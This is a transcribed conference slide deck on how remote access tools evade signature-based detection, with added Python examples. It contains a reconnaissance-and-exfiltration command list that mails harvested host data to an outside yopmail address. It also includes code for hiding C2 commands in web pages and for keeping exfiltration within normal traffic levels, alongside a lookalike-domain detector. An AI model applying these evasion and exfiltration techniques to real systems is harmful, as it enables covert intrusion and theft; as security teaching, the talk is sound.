Hiding in plain sight

This talk covers ways an attacker can make tooling look as much like normal users, behavior and traffic as possible. It demonstrates the limitations of signature-based detection systems and then discusses a prototype Remote Access Tool (RAT) designed to blend in with normal activity.

Presented at CodeMash, January 8, 2014

  1. Hiding in Plain Sight. Rob Gillen, @argodev. This work is licensed under a Creative Commons Attribution 3.0 License.
  2. Disclaimer. The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
  3. HTDCS: Helpdesk Ticket Driven Cyber Security
  4. Demonstration: Challenges of Signature Tools
  5. Network Overview
  6. Attack Pattern
  7. Attack Pattern
  8. Attack Pattern
  9. Attack Pattern
  10. Client Compromise (Simple)
  11. Client Compromise (Encoded & SSL)
  12. Overview
     • RAT Design
     • Encryption
     • Command/Control (C2)
     • AntiVirus
     • Behavior
  13. RAT Design
     • Exe is dropped via infected page
     • Queries web page for commands
     • Performs commands if not done previously
     • Periodically polls for new commands
  14. Encryption
     • Complex encryption is trivial
     • PBKDF: scrypt, a sequential memory-hard function
     • Many iterations (> 10K)
     • Long key lengths
  15. Encryption Example
     • The above configuration is custom-hardware resistant: it takes approximately ¼ second per guess
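As an added example (not code from the talk), the following Python derives a key the way slides 14 and 15 describe: a memory-hard scrypt PBKDF with a large work factor and a long output key, plus a timer that reports what one guess costs an attacker. The parameter values, the helper names and the passphrases are assumptions for this example; the slide only states the properties (memory-hard, many iterations, long key, roughly ¼ second per guess).

```python
import hashlib
import os
import time
from typing import List

# Assumed parameters for this example, not the talk's configuration.
# scrypt is sequential memory-hard: each guess must touch ~128 * r * N bytes,
# which is what blunts GPU/ASIC brute force.
SCRYPT_N = 2 ** 14      # CPU/memory cost; must be a power of two
SCRYPT_R = 8            # block size
SCRYPT_P = 1            # parallelism
KEY_LEN = 32            # 256-bit output key


def derive_key(passphrase: str, salt: bytes, n: int = SCRYPT_N,
               r: int = SCRYPT_R, p: int = SCRYPT_P,
               dklen: int = KEY_LEN) -> bytes:
    """Derive a fixed-length key from a passphrase with scrypt (stdlib hashlib)."""
    return hashlib.scrypt(passphrase.encode("utf-8"), salt=salt,
                          n=n, r=r, p=p,
                          maxmem=256 * 1024 * 1024, dklen=dklen)


def memory_bytes(n: int = SCRYPT_N, r: int = SCRYPT_R) -> int:
    """Approximate working memory one scrypt evaluation must hold."""
    return 128 * r * n


def seconds_per_guess(salt: bytes, samples: int = 3, **params) -> float:
    """Time one evaluation: the attacker's cost per offline password guess."""
    start = time.perf_counter()
    for i in range(samples):
        derive_key(f"guess-{i}", salt, **params)
    return (time.perf_counter() - start) / samples


def guesses_per_day(sec_per_guess: float, cores: int = 1) -> int:
    """Rough offline brute-force throughput for a given per-guess cost."""
    return int(cores * 86400 / sec_per_guess)


if __name__ == "__main__":
    salt = os.urandom(16)                       # random per-installation salt
    key = derive_key("correct horse battery staple", salt)
    print(f"key            = {key.hex()}")
    print(f"memory/guess   ~ {memory_bytes() // (1024 * 1024)} MiB")
    t = seconds_per_guess(salt)
    print(f"time/guess     ~ {t:.3f} s  ({guesses_per_day(t):,} guesses/day/core)")
```

Raising `SCRYPT_N` doubles both the memory and the time per guess; the slide's ¼-second figure is reached on ordinary hardware somewhere around N = 2^17 to 2^18 with r = 8, but the right setting is whatever your own timing shows.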
  16. Command/Control
     • Use a Web2C approach
       – Commands are “issued” en masse via normal, benign-looking web pages
       – Common ports
       – Leverages existing HTML/server constructs
  17. Command Text
       ipconfig /all > %APPDATA%\info.txt
       net start >> %APPDATA%\info.txt
       tasklist /v >> %APPDATA%\info.txt
       net user >> %APPDATA%\info.txt
       net localgroup administrators >> %APPDATA%\info.txt
       netstat -ano >> %APPDATA%\info.txt
       net use >> %APPDATA%\info.txt
       copy %APPDATA%\info.txt %APPDATA%\output.pdf
       del %APPDATA%\info.txt
       sendmail %APPDATA%\output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe836@yopmail.com smtp.yourorg.gov
       del %APPDATA%\output.pdf
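The following Python is an added simulation of the Web2C polling loop from slides 13 and 16, not the prototype's own code: jobs are carried inside ordinary HTML comments on an otherwise benign page, the client extracts them on each poll and runs only the ones it has not seen before. The comment marker format (`job:ID:base64`), the function names and the sample newsletter page are assumptions; the client here returns the command strings instead of executing anything.

```python
import base64
import re
from typing import Dict, List, Set, Tuple

# Assumed marker format for this example: an HTML comment the browser never
# renders, so a casual view of the page (or a proxy log of the URL) shows only
# the benign content.
JOB_RE = re.compile(r"<!--\s*job:(\d+):([A-Za-z0-9+/=]+)\s*-->")


def embed_jobs(page_html: str, jobs: Dict[int, str]) -> str:
    """Operator side: append jobs (id -> command text) to a page as comments."""
    comments = "".join(
        f"\n<!-- job:{jid}:{base64.b64encode(cmd.encode()).decode()} -->"
        for jid, cmd in sorted(jobs.items()))
    return page_html.replace("</body>", comments + "\n</body>")


def extract_jobs(page_html: str) -> Dict[int, str]:
    """Client side: recover every job present in the fetched page."""
    return {int(jid): base64.b64decode(b64).decode()
            for jid, b64 in JOB_RE.findall(page_html)}


def pending_jobs(page_html: str, done: Set[int]) -> List[Tuple[int, str]]:
    """Jobs not yet handled, in id order. Marks them handled so that the next
    poll of the same (unchanged) page yields nothing: the "if not done
    previously" rule from slide 13."""
    new = [(jid, cmd) for jid, cmd in sorted(extract_jobs(page_html).items())
           if jid not in done]
    done.update(jid for jid, _ in new)
    return new


# Constructed sample page: benign content plus two embedded jobs.
SAMPLE_PAGE = embed_jobs(
    "<html><body><h1>Quarterly newsletter</h1>"
    "<p>Welcome back!</p></body></html>",
    {101: "tasklist /v", 102: "net user"})


if __name__ == "__main__":
    done: Set[int] = set()
    print(pending_jobs(SAMPLE_PAGE, done))   # both jobs on the first poll
    print(pending_jobs(SAMPLE_PAGE, done))   # nothing on the next poll
    later = embed_jobs(SAMPLE_PAGE, {103: "netstat -ano"})
    print(pending_jobs(later, done))         # only the newly added job
```

Note what a signature tool sees: a GET for an ordinary URL on port 80/443 returning a page that parses as HTML, repeated on a schedule. The command never appears in the request, which is why the talk's later slides push the cadence and volume of the polling, rather than its content, as the thing to watch.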
  18. Mimic User Behavior
     • Traffic rates
       – Monitor incoming/outgoing network traffic for X days
       – Configure exfil to stay within X% of “normal”
     • C2
       – Exponential/randomized stand-down
       – Only communicate during periods of activity
  19. Mimic User Behavior
     • Target URLs
       – Monitor outgoing web queries/URLs for X days
       – Use similar domain names for malicious traffic
       – Append similar/same query strings to malicious requests
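As an added example for slide 18 (not the talk's code), the Python below turns the three rules into numbers: a per-hour traffic baseline learned over the monitoring window, an upload plan that stays within a chosen percentage of it and only during hours the host is normally active, and a stand-down timer with exponential backoff and full jitter so there is no fixed beacon interval to fingerprint. The baseline figures, percentage, function names and timer constants are constructed for this example.

```python
import random
from typing import Dict, List, Tuple

# Constructed baseline: average outgoing bytes per hour of day over the
# monitoring window (the slide's "X days"). Quiet overnight, busy 07:00-18:00.
BASELINE_BYTES_PER_HOUR: Dict[int, int] = {
    h: (0 if h < 7 or h > 18 else 40_000_000 + 5_000_000 * (h % 3))
    for h in range(24)}


def active_hours(baseline: Dict[int, int], min_bytes: int = 1_000_000) -> List[int]:
    """Hours in which the host normally talks at all; C2 stays silent otherwise."""
    return [h for h, b in baseline.items() if b >= min_bytes]


def exfil_budget(baseline: Dict[int, int], hour: int, pct: float) -> int:
    """Bytes the implant may add in `hour` while staying within pct% of normal."""
    return int(baseline.get(hour, 0) * pct / 100)


def schedule_chunks(total_bytes: int, baseline: Dict[int, int], pct: float,
                    start_hour: int = 9) -> List[Tuple[int, int]]:
    """Spread an upload across the remaining active hours of the day.
    Returns (hour, bytes) pairs; stops early if the day's budget runs out,
    leaving the rest for the next day rather than exceeding the budget."""
    plan: List[Tuple[int, int]] = []
    remaining = total_bytes
    for h in range(start_hour, 24):
        if remaining <= 0:
            break
        budget = exfil_budget(baseline, h, pct)
        if budget <= 0:
            continue                      # inactive hour: no traffic at all
        chunk = min(budget, remaining)
        plan.append((h, chunk))
        remaining -= chunk
    return plan


def standdown_seconds(failures: int, base: int = 60, cap: int = 3600,
                      rng: random.Random = random) -> float:
    """Exponential stand-down with full jitter: wait U(0, min(cap, base*2^n))."""
    ceiling = min(cap, base * 2 ** failures)
    return rng.uniform(0, ceiling)


def jittered_schedule(failures: int, seed: int, n: int = 5) -> List[float]:
    """Reproducible sequence of stand-down intervals (for inspection/testing)."""
    rng = random.Random(seed)
    return [standdown_seconds(failures, rng=rng) for _ in range(n)]


if __name__ == "__main__":
    print("active hours:", active_hours(BASELINE_BYTES_PER_HOUR))
    print("2% plan for 2 MB from 09:00:",
          schedule_chunks(2_000_000, BASELINE_BYTES_PER_HOUR, 2))
    print("stand-down after 3 failures:",
          [round(s) for s in jittered_schedule(3, seed=7)])
```

The defender's mirror image is the same baseline: a host whose outbound volume or first-seen connections drift outside its own historical envelope, or that talks at hours it never used to, is the signal a signature engine cannot give you.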
  20. Hiding in Logs
       v-client-5b.sjc.dropbox.com
       snt-re3-9a.sjc.dropbox.com
       yn-in-f125.1e100.net
       l1.ycs.vip.dcb.yahoo.com
       snt-re3-9a.sjc.drpbox.com
       ip-69-31-29-228.nlayer.net
       a23-47-20-211.deploy.static.akamaitechnologies.com
       l3.ycs.vip.dcb.yahoo.com
       ir2.fp.vip.bf1.yahoo.com
       www.nbcnews.com.edgesuite.net
       wac.946A.edgecastcdn.net
       a2.twimg.com
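Slide 20 is a log excerpt in which one hostname copies the label pattern of a legitimate neighbor but swaps the registrable domain; slide 19 describes building exactly such names. The Python below is an added detection-side example (not the talk's code) that runs over the slide's hostnames as constructed input: it baselines the domains seen repeatedly, then flags any host whose registrable domain is a near-miss (edit distance 1 or 2, but not equal) of a baselined one. The two-label "registrable domain" rule, the threshold and the function names are assumptions; a real deployment would use the Public Suffix List and a baseline from more than a dozen lines.

```python
from collections import Counter
from typing import Iterable, List, Tuple

# Hostnames exactly as listed on slide 20, used here as sample log input.
SLIDE_HOSTS = """v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com""".split()


def registrable(host: str) -> str:
    """Last two labels. Assumption: no Public Suffix List, so names under
    co.uk-style suffixes would be mis-split by this simplification."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with the usual two-row dynamic program."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def baseline_domains(hosts: Iterable[str], min_count: int = 2) -> List[str]:
    """Domains seen at least min_count times in the monitoring window."""
    counts = Counter(registrable(h) for h in hosts)
    return sorted(d for d, n in counts.items() if n >= min_count)


def lookalikes(hosts: Iterable[str], known: Iterable[str],
               max_dist: int = 2) -> List[Tuple[str, str, int]]:
    """(host, mimicked_domain, distance) for hosts whose registrable domain is
    close to, but not the same as, a known domain."""
    known_sorted = sorted(set(known))
    hits: List[Tuple[str, str, int]] = []
    for h in hosts:
        d = registrable(h)
        if d in known_sorted:
            continue                       # exact match: legitimate
        for k in known_sorted:
            dist = edit_distance(d, k)
            if 0 < dist <= max_dist:
                hits.append((h, k, dist))
                break
    return hits


if __name__ == "__main__":
    base = baseline_domains(SLIDE_HOSTS)
    print("baseline:", base)
    for host, mimicked, dist in lookalikes(SLIDE_HOSTS, base):
        print(f"LOOKALIKE {host} (distance {dist} from {mimicked})")
```

The hit is `snt-re3-9a.sjc.drpbox.com`: its left-hand labels are copied verbatim from the real Dropbox host two lines above it, which is what lets it pass a human skimming the log, while the registrable domain is one insertion away from `dropbox.com`, which is what a distance check catches. The same check on a first-seen domain list is cheap enough to run on every DNS or proxy log line.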
  21. Other Hiding Techniques
     • Office file content embedding
     • Creative location
  22. Next Steps
     • Know what you can and can’t see
     • Consider the implications of your monitoring strategy
     • Behavior *must* play a role
  23. Questions/Contact. Rob Gillen, rob@gillenfamily.net, http://rob.gillenfamily.net, @argodev